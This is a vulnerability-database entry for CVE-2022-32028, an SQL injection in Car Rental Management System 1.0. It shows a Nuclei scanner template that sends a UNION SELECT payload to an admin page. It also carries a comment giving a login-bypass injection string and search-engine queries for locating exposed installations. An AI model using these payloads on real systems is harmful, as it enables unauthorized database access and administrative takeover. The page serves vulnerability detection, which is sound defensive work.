Lucene search
K

Car Rental Management System 1.0 - SQL Injection

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. Attacker can obtain sensitive info from database, modify data, and execute unauthorized administrative operations

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-32028
2 Jun 202216:15
attackerkb
Circl
CVE-2022-32028
2 Jun 202220:26
circl
CNNVD
Car Rental Management System SQL注入漏洞
2 Jun 202200:00
cnnvd
CNVD
Car Rental Management System SQL Injection Vulnerability (CNVD-2022-61086)
9 Jun 202200:00
cnvd
CVE
CVE-2022-32028
2 Jun 202215:41
cve
Cvelist
CVE-2022-32028
2 Jun 202215:41
cvelist
EUVD
EUVD-2022-53321
2 Jun 202215:41
euvd
Nuclei
Car Rental Management System 1.0 - SQL Injection
28 Jun 202615:08
nuclei
NVD
CVE-2022-32028
2 Jun 202216:15
nvd
OSV
CVE-2022-32028
2 Jun 202216:15
osv
Rows per page
id: CVE-2022-32028

info:
  name: Car Rental Management System 1.0 - SQL Injection
  author: arafatansari
  severity: high
  description: |
    Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32028
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-32028
    cwe-id: CWE-89
    epss-score: 0.04919
    epss-percentile: 0.91023
    cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: car_rental_management_system_project
    product: car_rental_management_system
    shodan-query:
      - http.html:"Car Rental Management System"
      - http.html:"car rental management system"
    fofa-query: body="car rental management system"
    comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
  tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project,vuln
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /admin/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1
        Host: {{Hostname}}

    skip-variables-check: true
    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206880d24896d658c4277a4c34c5acdeefa77cf11146e02d73b7bd9512d2c6929b0221008df659feed466690b1f08869b0b2eb55663153810e579b2de1269fc0bfdcbd9e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.5
CVSS 3.17.2
EPSS0.04919
19